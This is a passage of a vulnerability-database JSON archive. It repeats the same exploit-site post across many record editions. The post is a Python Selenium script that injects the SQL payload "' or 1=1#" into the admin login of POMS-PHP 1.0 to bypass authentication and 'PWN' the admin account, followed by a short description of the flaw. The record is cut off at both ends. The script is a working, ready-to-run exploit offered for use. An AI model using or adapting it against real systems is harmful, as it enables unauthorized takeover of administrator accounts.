@nu11secur1ty\\n')\r\nprint(Style.RESET_ALL)\r\n\r\ntime.sleep(3)\r\nS = lambda X: driver.execute_script('return\r\ndocument.body.parentNode.scroll'+X)\r\n\r\ndriver.set_window_size(S('Width=1024'),S('Height=720')) # May need manual\r\nadjustment\r\ndriver.find_element_by_tag_name('body').screenshot('poc.png')\r\n\r\ndriver.quit()\r\n\r\nexcept Exception:\r\n#### This exception occurs if the element are not found in the webpage.\r\nprint(\"Some error occured :(\")\r\n\r\n\r\n------------------------------------------------------------------\r\n\r\n### Description:\r\nThe POMS-PHP (by: oretnom23 ) v1.0 is vulnerable to remote\r\nSQL-Injection-Bypass-Authentication for the admin account in app\r\n/purchase_order/classes/Login.php.\r\nremote SQL-Injection-Bypass-Authentication:\r\nhttps://portswigger.net/support/using-sql-injection-to-bypass-authentication.\r\n\r\nThe parameter (username) from the login form is not protected correctly and\r\nthere is no security and escaping from malicious payloads.\r\nWhen the user will sending a malicious query or malicious payload to the\r\nMySQL server, he can bypass the login credentials and take control of the\r\nadmin account.\n\n# 0day.today [2021-09-13] #"}, "lastseen": "2021-09-12T22:22:31", "differentElements": ["sourceData"], "edition": 4}, {"bulletin": {"id": "1337DAY-ID-36729", "hash": "50c0d1248cb9b64e36d6d141068a732d", "type": "zdt", "bulletinFamily": "exploit", "title": "POMS-PHP 1.0 SQL Injection Exploit", "description": "", "published": "2021-09-10T00:00:00", "modified": "2021-09-10T00:00:00", "cvss": {"score": 0.0, "vector": "NONE"}, "cvss2": {}, "cvss3": {}, "href": "https://0day.today/exploit/description/36729", "reporter": "zdt", "references": [], "cvelist": [], "immutableFields": [], "lastseen": "2021-09-13T22:24:54", "history": [], "viewCount": 29, "enchantments": {"dependencies": {"references": [], "modified": "2021-09-11T22:37:24", "rev": 2}, "score": {"value": 0.2, "vector": "NONE", "modified": "2021-09-11T22:37:24", "rev": 2}}, "objectVersion": "1.6", "sourceHref": "https://0day.today/exploit/36729", "sourceData": "### Exploit Title: POMS-PHP (by: oretnom23 ) v1.0 is vulnerable to remote\r\nSQL-Injection-Bypass-Authentication.\r\n### Author: nu11secur1ty\r\n### Testing and Debugging: nu11secur1ty\r\n### Vendor: https://www.sourcecodester.com/user/257130/activity\r\n### Link:\r\nhttps://www.sourcecodester.com/php/14935/purchase-order-management-system-using-php-free-source-code.html#comment-form\r\n### CVE: CVE-nu11-09\r\n\r\n[+] Exploit Source:\r\n\r\n#!/usr/bin/python\r\n# Author @nu11secur1ty\r\nimport time\r\nfrom selenium import webdriver\r\nfrom selenium.webdriver.chrome.options import Options\r\nfrom colorama import init, Fore, Back, Style\r\ninit(convert=True)\r\n\r\n\r\noptions = webdriver.ChromeOptions()\r\noptions.headless = True\r\ndriver = webdriver.Chrome(options=options)\r\n\r\nPoC = 'http://localhost/purchase_order/admin/login.php'\r\n\r\ndriver.get(PoC)\r\n\r\n#enter your login username\r\nusername=\"nu11secur1ty' or 1=1#\"\r\n\r\n#enter your login password\r\npassword=\"nu11secur1ty' or 1=1#\"\r\n\r\n# test the exploit username\r\n#username=\"test\"\r\n\r\n# test the exploit password\r\n#password=\"blavsdfdfaaa\"\r\n\r\n#enter the element for username input field\r\nelement_for_username=\"username\"\r\n#enter the element for password input field\r\nelement_for_password=\"password\"\r\n\r\ntry:\r\n### 0\r\nusername_element = driver.find_element_by_name(element_for_username)\r\nusername_element.send_keys(username)\r\npassword_element = driver.find_element_by_name(element_for_password)\r\npassword_element.send_keys(password)\r\n\r\ntime.sleep(1)\r\ndriver.execute_script(\"document.querySelector('[class=\\\"btn btn-primary\r\nbtn-block\\\"]').click()\")\r\n\r\nprint(Fore.RED + 'The payload for CVE-nu11-09 is deployed and your admin\r\naccount is PWNED by SQL - Injection\\n')\r\nprint(Fore.GREEN + 'Please see the screenshot poc.png to see if your\r\nexploit is working =) BR @nu11secur1ty\\n')\r\nprint(Style.RESET_ALL)\r\n\r\ntime.sleep(3)\r\nS = lambda X: driver.execute_script('return\r\ndocument.body.parentNode.scroll'+X)\r\n\r\ndriver.set_window_size(S('Width=1024'),S('Height=720')) # May need manual\r\nadjustment\r\ndriver.find_element_by_tag_name('body').screenshot('poc.png')\r\n\r\ndriver.quit()\r\n\r\nexcept Exception:\r\n#### This exception occurs if the element are not found in the webpage.\r\nprint(\"Some error occured :(\")\r\n\r\n\r\n------------------------------------------------------------------\r\n\r\n### Description:\r\nThe POMS-PHP (by: oretnom23 ) v1.0 is vulnerable to remote\r\nSQL-Injection-Bypass-Authentication for the admin account in app\r\n/purchase_order/classes/Login.php.\r\nremote SQL-Injection-Bypass-Authentication:\r\nhttps://portswigger.net/support/using-sql-injection-to-bypass-authentication.\r\n\r\nThe parameter (username) from the login form is not protected correctly and\r\nthere is no security and escaping from malicious payloads.\r\nWhen the user will sending a malicious query or malicious payload to the\r\nMySQL server, he can bypass the login credentials and take control of the\r\nadmin account.\n\n# 0day.today [2021-09-14] #"}, "lastseen": "2021-09-13T22:24:54", "differentElements": ["sourceData"], "edition": 5}, {"bulletin": {"id": "1337DAY-ID-36729", "hash": "68095a44d0c13357680fdc30aea0c8c4", "type": "zdt", "bulletinFamily": "exploit", "title": "POMS-PHP 1.0 SQL Injection Exploit", "description": "", "published": "2021-09-10T00:00:00", "modified": "2021-09-10T00:00:00", "cvss": {"score": 0.0, "vector": "NONE"}, "cvss2": {}, "cvss3": {}, "href": "https://0day.today/exploit/description/36729", "reporter": "zdt", "references": [], "cvelist": [], "immutableFields": [], "lastseen": "2021-09-14T22:25:21", "history": [], "viewCount": 30, "enchantments": {"dependencies": {"references": [], "modified": "2021-09-11T22:37:24", "rev": 2}, "score": {"value": 0.2, "vector": "NONE", "modified": "2021-09-11T22:37:24", "rev": 2}}, "objectVersion": "1.6", "sourceHref": "https://0day.today/exploit/36729", "sourceData": "### Exploit Title: POMS-PHP (by: oretnom23 ) v1.0 is vulnerable to remote\r\nSQL-Injection-Bypass-Authentication.\r\n### Author: nu11secur1ty\r\n### Testing and Debugging: nu11secur1ty\r\n### Vendor: https://www.sourcecodester.com/user/257130/activity\r\n### Link:\r\nhttps://www.sourcecodester.com/php/14935/purchase-order-management-system-using-php-free-source-code.html#comment-form\r\n### CVE: CVE-nu11-09\r\n\r\n[+] Exploit Source:\r\n\r\n#!/usr/bin/python\r\n# Author @nu11secur1ty\r\nimport time\r\nfrom selenium import webdriver\r\nfrom selenium.webdriver.chrome.options import Options\r\nfrom colorama import init, Fore, Back, Style\r\ninit(convert=True)\r\n\r\n\r\noptions = webdriver.ChromeOptions()\r\noptions.headless = True\r\ndriver = webdriver.Chrome(options=options)\r\n\r\nPoC = 'http://localhost/purchase_order/admin/login.php'\r\n\r\ndriver.get(PoC)\r\n\r\n#enter your login username\r\nusername=\"nu11secur1ty' or 1=1#\"\r\n\r\n#enter your login password\r\npassword=\"nu11secur1ty' or 1=1#\"\r\n\r\n# test the exploit username\r\n#username=\"test\"\r\n\r\n# test the exploit password\r\n#password=\"blavsdfdfaaa\"\r\n\r\n#enter the element for username input field\r\nelement_for_username=\"username\"\r\n#enter the element for password input field\r\nelement_for_password=\"password\"\r\n\r\ntry:\r\n### 0\r\nusername_element = driver.find_element_by_name(element_for_username)\r\nusername_element.send_keys(username)\r\npassword_element = driver.find_element_by_name(element_for_password)\r\npassword_element.send_keys(password)\r\n\r\ntime.sleep(1)\r\ndriver.execute_script(\"document.querySelector('[class=\\\"btn btn-primary\r\nbtn-block\\\"]').click()\")\r\n\r\nprint(Fore.RED + 'The payload for CVE-nu11-09 is deployed and your admin\r\naccount is PWNED by SQL - Injection\\n')\r\nprint(Fore.GREEN + 'Please see the screenshot poc.png to see if your\r\nexploit is working =) BR @nu11secur1ty\\n')\r\nprint(Style.RESET_ALL)\r\n\r\ntime.sleep(3)\r\nS = lambda X: driver.execute_script('return\r\ndocument.body.parentNode.scroll'+X)\r\n\r\ndriver.set_window_size(S('Width=1024'),S('Height=720')) # May need manual\r\nadjustment\r\ndriver.find_element_by_tag_name('body').screenshot('poc.png')\r\n\r\ndriver.quit()\r\n\r\nexcept Exception:\r\n#### This exception occurs if the element are not found in the webpage.\r\nprint(\"Some error occured :(\")\r\n\r\n\r\n------------------------------------------------------------------\r\n\r\n### Description:\r\nThe POMS-PHP (by: oretnom23 ) v1.0 is vulnerable to remote\r\nSQL-Injection-Bypass-Authentication for the admin account in app\r\n/purchase_order/classes/Login.php.\r\nremote SQL-Injection-Bypass-Authentication:\r\nhttps://portswigger.net/support/using-sql-injection-to-bypass-authentication.\r\n\r\nThe parameter (username) from the login form is not protected correctly and\r\nthere is no security and escaping from malicious payloads.\r\nWhen the user will sending a malicious query or malicious payload to the\r\nMySQL server, he can bypass the login credentials and take control of the\r\nadmin account.\n\n# 0day.today [2021-09-15] #"}, "lastseen": "2021-09-14T22:25:21", "differentElements": ["sourceData"], "edition": 6}, {"bulletin": {"id": "1337DAY-ID-36729", "hash": "76a556fe4fa0433d7efcf3fc399e8e1d", "type": "zdt", "bulletinFamily": "exploit", "title": "POMS-PHP 1.0 SQL Injection Exploit", "description": "", "published": "2021-09-10T00:00:00", "modified": "2021-09-10T00:00:00", "cvss": {"score": 0.0, "vector": "NONE"}, "cvss2": {}, "cvss3": {}, "href": "https://0day.today/exploit/description/36729", "reporter": "zdt", "references": [], "cvelist": [], "immutableFields": [], "lastseen": "2021-09-15T22:47:20", "history": [], "viewCount": 31, "enchantments": {"dependencies": {"references": [], "modified": "2021-09-15T22:47:20", "rev": 2}, "score": {"value": 0.2, "vector": "NONE", "modified": "2021-09-15T22:47:20", "rev": 2}}, "objectVersion": "1.6", "sourceHref": "https://0day.today/exploit/36729", "sourceData": "### Exploit Title: POMS-PHP (by: oretnom23 ) v1.0 is vulnerable to remote\r\nSQL-Injection-Bypass-Authentication.\r\n### Author: nu11secur1ty\r\n### Testing and Debugging: nu11secur1ty\r\n### Vendor: https://www.sourcecodester.com/user/257130/activity\r\n### Link:\r\nhttps://www.sourcecodester.com/php/14935/purchase-order-management-system-using-php-free-source-code.html#comment-form\r\n### CVE: CVE-nu11-09\r\n\r\n[+] Exploit Source:\r\n\r\n#!/usr/bin/python\r\n# Author @nu11secur1ty\r\nimport time\r\nfrom selenium import webdriver\r\nfrom selenium.webdriver.chrome.options import Options\r\nfrom colorama import init, Fore, Back, Style\r\ninit(convert=True)\r\n\r\n\r\noptions = webdriver.ChromeOptions()\r\noptions.headless = True\r\ndriver = webdriver.Chrome(options=options)\r\n\r\nPoC = 'http://localhost/purchase_order/admin/login.php'\r\n\r\ndriver.get(PoC)\r\n\r\n#enter your login username\r\nusername=\"nu11secur1ty' or 1=1#\"\r\n\r\n#enter your login password\r\npassword=\"nu11secur1ty' or 1=1#\"\r\n\r\n# test the exploit username\r\n#username=\"test\"\r\n\r\n# test the exploit password\r\n#password=\"blavsdfdfaaa\"\r\n\r\n#enter the element for username input field\r\nelement_for_username=\"username\"\r\n#enter the element for password input field\r\nelement_for_password=\"password\"\r\n\r\ntry:\r\n### 0\r\nusername_element = driver.find_element_by_name(element_for_username)\r\nusername_element.send_keys(username)\r\npassword_element = driver.find_element_by_name(element_for_password)\r\npassword_element.send_keys(password)\r\n\r\ntime.sleep(1)\r\ndriver.execute_script(\"document.querySelector('[class=\\\"btn btn-primary\r\nbtn-block\\\"]').click()\")\r\n\r\nprint(Fore.RED + 'The payload for CVE-nu11-09 is deployed and your admin\r\naccount is PWNED by SQL - Injection\\n')\r\nprint(Fore.GREEN + 'Please see the screenshot poc.png to see if your\r\nexploit is working =) BR @nu11secur1ty\\n')\r\nprint(Style.RESET_ALL)\r\n\r\ntime.sleep(3)\r\nS = lambda X: driver.execute_script('return\r\ndocument.body.parentNode.scroll'+X)\r\n\r\ndriver.set_window_size(S('Width=1024'),S('Height=720')) # May need manual\r\nadjustment\r\ndriver.find_element_by_tag_name('body').screenshot('poc.png')\r\n\r\ndriver.quit()\r\n\r\nexcept Exception:\r\n#### This exception occurs if the element are not found in the webpage.\r\nprint(\"Some error occured :(\")\r\n\r\n\r\n------------------------------------------------------------------\r\n\r\n### Description:\r\nThe POMS-PHP (by: oretnom23 ) v1.0 is vulnerable to remote\r\nSQL-Injection-Bypass-Authentication for the admin account in app\r\n/purchase_order/classes/Login.php.\r\nremote SQL-Injection-Bypass-Authentication:\r\nhttps://portswigger.net/support/using-sql-injection-to-bypass-authentication.\r\n\r\nThe parameter (username) from the login form is not protected correctly and\r\nthere is no security and escaping from malicious payloads.\r\nWhen the user will sending a malicious query or malicious payload to the\r\nMySQL server, he can bypass the login credentials and take control of the\r\nadmin account.\n\n# 0day.today [2021-09-16] #"}, "lastseen": "2021-09-15T22:47:20", "differentElements": ["sourceData"], "edition": 7}, {"bulletin": {"id": "1337DAY-ID-36729", "hash": "131bd6d44f7cc16bc2a3ad5cb4be993b", "type": "zdt", "bulletinFamily": "exploit", "title": "POMS-PHP 1.0 SQL Injection Exploit", "description": "", "published": "2021-09-10T00:00:00", "modified": "2021-09-10T00:00:00", "cvss": {"score": 0.0, "vector": "NONE"}, "cvss2": {}, "cvss3": {}, "href": "https://0day.today/exploit/description/36729", "reporter": "zdt", "references": [], "cvelist": [], "immutableFields": [], "lastseen": "2021-09-16T22:55:39", "history": [], "viewCount": 32, "enchantments": {"dependencies": {"references": [], "modified": "2021-09-16T22:55:39", "rev": 2}, "score": {"value": 0.2, "vector": "NONE", "modified": "2021-09-16T22:55:39", "rev": 2}}, "objectVersion": "1.6", "sourceHref": "https://0day.today/exploit/36729", "sourceData": "### Exploit Title: POMS-PHP (by: oretnom23 ) v1.0 is vulnerable to remote\r\nSQL-Injection-Bypass-Authentication.\r\n### Author: nu11secur1ty\r\n### Testing and Debugging: nu11secur1ty\r\n### Vendor: https://www.sourcecodester.com/user/257130/activity\r\n### Link:\r\nhttps://www.sourcecodester.com/php/14935/purchase-order-management-system-using-php-free-source-code.html#comment-form\r\n### CVE: CVE-nu11-09\r\n\r\n[+] Exploit Source:\r\n\r\n#!/usr/bin/python\r\n# Author @nu11secur1ty\r\nimport time\r\nfrom selenium import webdriver\r\nfrom selenium.webdriver.chrome.options import Options\r\nfrom colorama import init, Fore, Back, Style\r\ninit(convert=True)\r\n\r\n\r\noptions = webdriver.ChromeOptions()\r\noptions.headless = True\r\ndriver = webdriver.Chrome(options=options)\r\n\r\nPoC = 'http://localhost/purchase_order/admin/login.php'\r\n\r\ndriver.get(PoC)\r\n\r\n#enter your login username\r\nusername=\"nu11secur1ty' or 1=1#\"\r\n\r\n#enter your login password\r\npassword=\"nu11secur1ty' or 1=1#\"\r\n\r\n# test the exploit username\r\n#username=\"test\"\r\n\r\n# test the exploit password\r\n#password=\"blavsdfdfaaa\"\r\n\r\n#enter the element for username input field\r\nelement_for_username=\"username\"\r\n#enter the element for password input field\r\nelement_for_password=\"password\"\r\n\r\ntry:\r\n### 0\r\nusername_element = driver.find_element_by_name(element_for_username)\r\nusername_element.send_keys(username)\r\npassword_element = driver.find_element_by_name(element_for_password)\r\npassword_element.send_keys(password)\r\n\r\ntime.sleep(1)\r\ndriver.execute_script(\"document.querySelector('[class=\\\"btn btn-primary\r\nbtn-block\\\"]').click()\")\r\n\r\nprint(Fore.RED + 'The payload for CVE-nu11-09 is deployed and your admin\r\naccount is PWNED by SQL - Injection\\n')\r\nprint(Fore.GREEN + 'Please see the screenshot poc.png to see if your\r\nexploit is working =) BR @nu11secur1ty\\n')\r\nprint(Style.RESET_ALL)\r\n\r\ntime.sleep(3)\r\nS = lambda X: driver.execute_script('return\r\ndocument.body.parentNode.scroll'+X)\r\n\r\ndriver.set_window_size(S('Width=1024'),S('Height=720')) # May need manual\r\nadjustment\r\ndriver.find_element_by_tag_name('body').screenshot('poc.png')\r\n\r\ndriver.quit()\r\n\r\nexcept Exception:\r\n#### This exception occurs if the element are not found in the webpage.\r\nprint(\"Some error occured :(\")\r\n\r\n\r\n------------------------------------------------------------------\r\n\r\n### Description:\r\nThe POMS-PHP (by: oretnom23 ) v1.0 is vulnerable to remote\r\nSQL-Injection-Bypass-Authentication for the admin account in app\r\n/purchase_order/classes/Login.php.\r\nremote SQL-Injection-Bypass-Authentication:\r\nhttps://portswigger.net/support/using-sql-injection-to-bypass-authentication.\r\n\r\nThe parameter (username) from the login form is not protected correctly and\r\nthere is no security and escaping from malicious payloads.\r\nWhen the user will sending a malicious query or malicious payload to the\r\nMySQL server, he can bypass the login credentials and take control of the\r\nadmin account.\n\n# 0day.today [2021-09-17] #"}, "lastseen": "2021-09-16T22:55:39", "differentElements": ["sourceData"], "edition": 8}, {"bulletin": {"id": "1337DAY-ID-36729", "hash": "dc5e7d16513804040e0cc082027e8666", "type": "zdt", "bulletinFamily": "exploit", "title": "POMS-PHP 1.0 SQL Injection Exploit", "description": "", "published": "2021-09-10T00:00:00", "modified": "2021-09-10T00:00:00", "cvss": {"score": 0.0, "vector": "NONE"}, "cvss2": {}, "cvss3": {}, "href": "https://0day.today/exploit/description/36729", "reporter": "zdt", "references": [], "cvelist": [], "immutableFields": [], "lastseen": "2021-09-20T20:43:50", "history": [], "viewCount": 32, "enchantments": {"dependencies": {"references": [], "modified": "2021-09-16T22:55:39", "rev": 2}, "score": {"value": 0.2, "vector": "NONE", "modified": "2021-09-16T22:55:39", "rev": 2}}, "objectVersion": "1.6", "sourceHref": "https://0day.today/exploit/36729", "sourceData": "### Exploit Title: POMS-PHP (by: oretnom23 ) v1.0 is vulnerable to remote\r\nSQL-Injection-Bypass-Authentication.\r\n### Author: nu11secur1ty\r\n### Testing and Debugging: nu11secur1ty\r\n### Vendor: https://www.sourcecodester.com/user/257130/activity\r\n### Link:\r\nhttps://www.sourcecodester.com/php/14935/purchase-order-management-system-using-php-free-source-code.html#comment-form\r\n### CVE: CVE-nu11-09\r\n\r\n[+] Exploit Source:\r\n\r\n#!/usr/bin/python\r\n# Author @nu11secur1ty\r\nimport time\r\nfrom selenium import webdriver\r\nfrom selenium.webdriver.chrome.options import Options\r\nfrom colorama import init, Fore, Back, Style\r\ninit(convert=True)\r\n\r\n\r\noptions = webdriver.ChromeOptions()\r\noptions.headless = True\r\ndriver = webdriver.Chrome(options=options)\r\n\r\nPoC = 'http://localhost/purchase_order/admin/login.php'\r\n\r\ndriver.get(PoC)\r\n\r\n#enter your login username\r\nusername=\"nu11secur1ty' or 1=1#\"\r\n\r\n#enter your login password\r\npassword=\"nu11secur1ty' or 1=1#\"\r\n\r\n# test the exploit username\r\n#username=\"test\"\r\n\r\n# test the exploit password\r\n#password=\"blavsdfdfaaa\"\r\n\r\n#enter the element for username input field\r\nelement_for_username=\"username\"\r\n#enter the element for password input field\r\nelement_for_password=\"password\"\r\n\r\ntry:\r\n### 0\r\nusername_element = driver.find_element_by_name(element_for_username)\r\nusername_element.send_keys(username)\r\npassword_element = driver.find_element_by_name(element_for_password)\r\npassword_element.send_keys(password)\r\n\r\ntime.sleep(1)\r\ndriver.execute_script(\"document.querySelector('[class=\\\"btn btn-primary\r\nbtn-block\\\"]').click()\")\r\n\r\nprint(Fore.RED + 'The payload for CVE-nu11-09 is deployed and your admin\r\naccount is PWNED by SQL - Injection\\n')\r\nprint(Fore.GREEN + 'Please see the screenshot poc.png to see if your\r\nexploit is working =) BR @nu11secur1ty\\n')\r\nprint(Style.RESET_ALL)\r\n\r\ntime.sleep(3)\r\nS = lambda X: driver.execute_script('return\r\ndocument.body.parentNode.scroll'+X)\r\n\r\ndriver.set_window_size(S('Width=1024'),S('Height=720')) # May need manual\r\nadjustment\r\ndriver.find_element_by_tag_name('body').screenshot('poc.png')\r\n\r\ndriver.quit()\r\n\r\nexcept Exception:\r\n#### This exception occurs if the element are not found in the webpage.\r\nprint(\"Some error occured :(\")\r\n\r\n\r\n------------------------------------------------------------------\r\n\r\n### Description:\r\nThe POMS-PHP (by: oretnom23 ) v1.0 is vulnerable to remote\r\nSQL-Injection-Bypass-Authentication for the admin account in app\r\n/purchase_order/classes/Login.php.\r\nremote SQL-Injection-Bypass-Authentication:\r\nhttps://portswigger.net/support/using-sql-injection-to-bypass-authentication.\r\n\r\nThe parameter (username) from the login form is not protected correctly and\r\nthere is no security and escaping from malicious payloads.\r\nWhen the user will sending a malicious query or malicious payload to the\r\nMySQL server, he can bypass the login credentials and take control of the\r\nadmin account.\n\n# 0day.today [2021-09-20] #"}, "lastseen": "2021-09-20T20:43:50", "differentElements": ["sourceData"], "edition": 9}, {"bulletin": {"id": "1337DAY-ID-36729", "hash": "89435c8257c64dcc083429b74d237a22", "type": "zdt", "bulletinFamily": "exploit", "title": "POMS-PHP 1.0 SQL Injection Exploit", "description": "", "published": "2021-09-10T00:00:00", "modified": "2021-09-10T00:00:00", "cvss": {"score": 0.0, "vector": "NONE"}, "cvss2": {}, "cvss3": {}, "href": "https://0day.today/exploit/description/36729", "reporter": "zdt", "references": [], "cvelist": [], "immutableFields": [], "lastseen": "2021-09-21T00:42:52", "history": [], "viewCount": 33, "enchantments": {"dependencies": {"references": [], "modified": "2021-09-21T00:42:52", "rev": 2}, "score": {"value": 0.2, "vector": "NONE", "modified": "2021-09-21T00:42:52", "rev": 2}}, "objectVersion": "1.6", "sourceHref": "https://0day.today/exploit/36729", "sourceData": "### Exploit Title: POMS-PHP (by: oretnom23 ) v1.0 is vulnerable to remote\r\nSQL-Injection-Bypass-Authentication.\r\n### Author: nu11secur1ty\r\n### Testing and Debugging: nu11secur1ty\r\n### Vendor: https://www.sourcecodester.com/user/257130/activity\r\n### Link:\r\nhttps://www.sourcecodester.com/php/14935/purchase-order-management-system-using-php-free-source-code.html#comment-form\r\n### CVE: CVE-nu11-09\r\n\r\n[+] Exploit Source:\r\n\r\n#!/usr/bin/python\r\n# Author @nu11secur1ty\r\nimport time\r\nfrom selenium import webdriver\r\nfrom selenium.webdriver.chrome.options import Options\r\nfrom colorama import init, Fore, Back, Style\r\ninit(convert=True)\r\n\r\n\r\noptions = webdriver.ChromeOptions()\r\noptions.headless = True\r\ndriver = webdriver.Chrome(options=options)\r\n\r\nPoC = 'http://localhost/purchase_order/admin/login.php'\r\n\r\ndriver.get(PoC)\r\n\r\n#enter your login username\r\nusername=\"nu11secur1ty' or 1=1#\"\r\n\r\n#enter your login password\r\npassword=\"nu11secur1ty' or 1=1#\"\r\n\r\n# test the exploit username\r\n#username=\"test\"\r\n\r\n# test the exploit password\r\n#password=\"blavsdfdfaaa\"\r\n\r\n#enter the element for username input field\r\nelement_for_username=\"username\"\r\n#enter the element for password input field\r\nelement_for_password=\"password\"\r\n\r\ntry:\r\n### 0\r\nusername_element = driver.find_element_by_name(element_for_username)\r\nusername_element.send_keys(username)\r\npassword_element = driver.find_element_by_name(element_for_password)\r\npassword_element.send_keys(password)\r\n\r\ntime.sleep(1)\r\ndriver.execute_script(\"document.querySelector('[class=\\\"btn btn-primary\r\nbtn-block\\\"]').click()\")\r\n\r\nprint(Fore.RED + 'The payload for CVE-nu11-09 is deployed and your admin\r\naccount is PWNED by SQL - Injection\\n')\r\nprint(Fore.GREEN + 'Please see the screenshot poc.png to see if your\r\nexploit is working =) BR @nu11secur1ty\\n')\r\nprint(Style.RESET_ALL)\r\n\r\ntime.sleep(3)\r\nS = lambda X: driver.execute_script('return\r\ndocument.body.parentNode.scroll'+X)\r\n\r\ndriver.set_window_size(S('Width=1024'),S('Height=720')) # May need manual\r\nadjustment\r\ndriver.find_element_by_tag_name('body').screenshot('poc.png')\r\n\r\ndriver.quit()\r\n\r\nexcept Exception:\r\n#### This exception occurs if the element are not found in the webpage.\r\nprint(\"Some error occured :(\")\r\n\r\n\r\n------------------------------------------------------------------\r\n\r\n### Description:\r\nThe POMS-PHP (by: oretnom23 ) v1.0 is vulnerable to remote\r\nSQL-Injection-Bypass-Authentication for the admin account in app\r\n/purchase_order/classes/Login.php.\r\nremote SQL-Injection-Bypass-Authentication:\r\nhttps://portswigger.net/support/using-sql-injection-to-bypass-authentication.\r\n\r\nThe parameter (username) from the login form is not protected correctly and\r\nthere is no security and escaping from malicious payloads.\r\nWhen the user will sending a malicious query or malicious payload to the\r\nMySQL server, he can bypass the login credentials and take control of the\r\nadmin account.\n\n# 0day.today [2021-09-21] #"}, "lastseen": "2021-09-21T00:42:52", "differentElements": ["sourceData"], "edition": 10}, {"bulletin": {"id": "1337DAY-ID-36729", "hash": "21578f733f3f4f1a65835f95c0bc8138", "type": "zdt", "bulletinFamily": "exploit", "title": "POMS-PHP 1.0 SQL Injection Exploit", "description": "", "published": "2021-09-10T00:00:00", "modified": "2021-09-10T00:00:00", "cvss": {"score": 0.0, "vector": "NONE"}, "cvss2": {}, "cvss3": {}, "href": "https://0day.today/exploit/description/36729", "reporter": "zdt", "references": [], "cvelist": [], "immutableFields": [], "lastseen": "2021-09-22T07:08:17", "history": [], "viewCount": 33, "enchantments": {"dependencies": {"references": [], "modified": "2021-09-22T07:08:17", "rev": 2}, "score": {"value": 0.2, "vector": "NONE", "modified": "2021-09-22T07:08:17", "rev": 2}}, "objectVersion": "1.6", "sourceHref": "https://0day.today/exploit/36729", "sourceData": "### Exploit Title: POMS-PHP (by: oretnom23 ) v1.0 is vulnerable to remote\r\nSQL-Injection-Bypass-Authentication.\r\n### Author: nu11secur1ty\r\n### Testing and Debugging: nu11secur1ty\r\n### Vendor: https://www.sourcecodester.com/user/257130/activity\r\n### Link:\r\nhttps://www.sourcecodester.com/php/14935/purchase-order-management-system-using-php-free-source-code.html#comment-form\r\n### CVE: CVE-nu11-09\r\n\r\n[+] Exploit Source:\r\n\r\n#!/usr/bin/python\r\n# Author @nu11secur1ty\r\nimport time\r\nfrom selenium import webdriver\r\nfrom selenium.webdriver.chrome.options import Options\r\nfrom colorama import init, Fore, Back, Style\r\ninit(convert=True)\r\n\r\n\r\noptions = webdriver.ChromeOptions()\r\noptions.headless = True\r\ndriver = webdriver.Chrome(options=options)\r\n\r\nPoC = 'http://localhost/purchase_order/admin/login.php'\r\n\r\ndriver.get(PoC)\r\n\r\n#enter your login username\r\nusername=\"nu11secur1ty' or 1=1#\"\r\n\r\n#enter your login password\r\npassword=\"nu11secur1ty' or 1=1#\"\r\n\r\n# test the exploit username\r\n#username=\"test\"\r\n\r\n# test the exploit password\r\n#password=\"blavsdfdfaaa\"\r\n\r\n#enter the element for username input field\r\nelement_for_username=\"username\"\r\n#enter the element for password input field\r\nelement_for_password=\"password\"\r\n\r\ntry:\r\n### 0\r\nusername_element = driver.find_element_by_name(element_for_username)\r\nusername_element.send_keys(username)\r\npassword_element = driver.find_element_by_name(element_for_password)\r\npassword_element.send_keys(password)\r\n\r\ntime.sleep(1)\r\ndriver.execute_script(\"document.querySelector('[class=\\\"btn btn-primary\r\nbtn-block\\\"]').click()\")\r\n\r\nprint(Fore.RED + 'The payload for CVE-nu11-09 is deployed and your admin\r\naccount is PWNED by SQL - Injection\\n')\r\nprint(Fore.GREEN + 'Please see the screenshot poc.png to see if your\r\nexploit is working =) BR @nu11secur1ty\\n')\r\nprint(Style.RESET_ALL)\r\n\r\ntime.sleep(3)\r\nS = lambda X: driver.execute_script('return\r\ndocument.body.parentNode.scroll'+X)\r\n\r\ndriver.set_window_size(S('Width=1024'),S('Height=720')) # May need manual\r\nadjustment\r\ndriver.find_element_by_tag_name('body').screenshot('poc.png')\r\n\r\ndriver.quit()\r\n\r\nexcept Exception:\r\n#### This exception occurs if the element are not found in the webpage.\r\nprint(\"Some error occured :(\")\r\n\r\n\r\n------------------------------------------------------------------\r\n\r\n### Description:\r\nThe POMS-PHP (by: oretnom23 ) v1.0 is vulnerable to remote\r\nSQL-Injection-Bypass-Authentication for the admin account in app\r\n/purchase_order/classes/Login.php.\r\nremote SQL-Injection-Bypass-Authentication:\r\nhttps://portswigger.net/support/using-sql-injection-to-bypass-authentication.\r\n\r\nThe parameter (username) from the login form is not protected correctly and\r\nthere is no security and escaping from malicious payloads.\r\nWhen the user will sending a malicious query or malicious payload to the\r\nMySQL server, he can bypass the login credentials and take control of the\r\nadmin account.\n\n# 0day.today [2021-09-22] #"}, "lastseen": "2021-09-22T07:08:17", "differentElements": ["sourceData"], "edition": 11}, {"bulletin": {"id": "1337DAY-ID-36729", "hash": "e4bf55f43a69ffbe0ca4e014a3513f8b", "type": "zdt", "bulletinFamily": "exploit", "title": "POMS-PHP 1.0 SQL Injection Exploit", "description": "", "published": "2021-09-10T00:00:00", "modified": "2021-09-10T00:00:00", "cvss": {"score": 0.0, "vector": "NONE"}, "cvss2": {}, "cvss3": {}, "href": "https://0day.today/exploit/description/36729", "reporter": "zdt", "references": [], "cvelist": [], "immutableFields": [], "lastseen": "2021-09-22T22:19:55", "history": [], "viewCount": 33, "enchantments": {"dependencies": {"references": [], "modified": "2021-09-22T22:19:55", "rev": 2}, "score": {"value": 0.2, "vector": "NONE", "modified": "2021-09-22T22:19:55", "rev": 2}}, "objectVersion": "1.6", "sourceHref": "https://0day.today/exploit/36729", "sourceData": "### Exploit Title: POMS-PHP (by: oretnom23 ) v1.0 is vulnerable to remote\r\nSQL-Injection-Bypass-Authentication.\r\n### Author: nu11secur1ty\r\n### Testing and Debugging: nu11secur1ty\r\n### Vendor: https://www.sourcecodester.com/user/257130/activity\r\n### Link:\r\nhttps://www.sourcecodester.com/php/14935/purchase-order-management-system-using-php-free-source-code.html#comment-form\r\n### CVE: CVE-nu11-09\r\n\r\n[+] Exploit Source:\r\n\r\n#!/usr/bin/python\r\n# Author @nu11secur1ty\r\nimport time\r\nfrom selenium import webdriver\r\nfrom selenium.webdriver.chrome.options import Options\r\nfrom colorama import init, Fore, Back, Style\r\ninit(convert=True)\r\n\r\n\r\noptions = webdriver.ChromeOptions()\r\noptions.headless = True\r\ndriver = webdriver.Chrome(options=options)\r\n\r\nPoC = 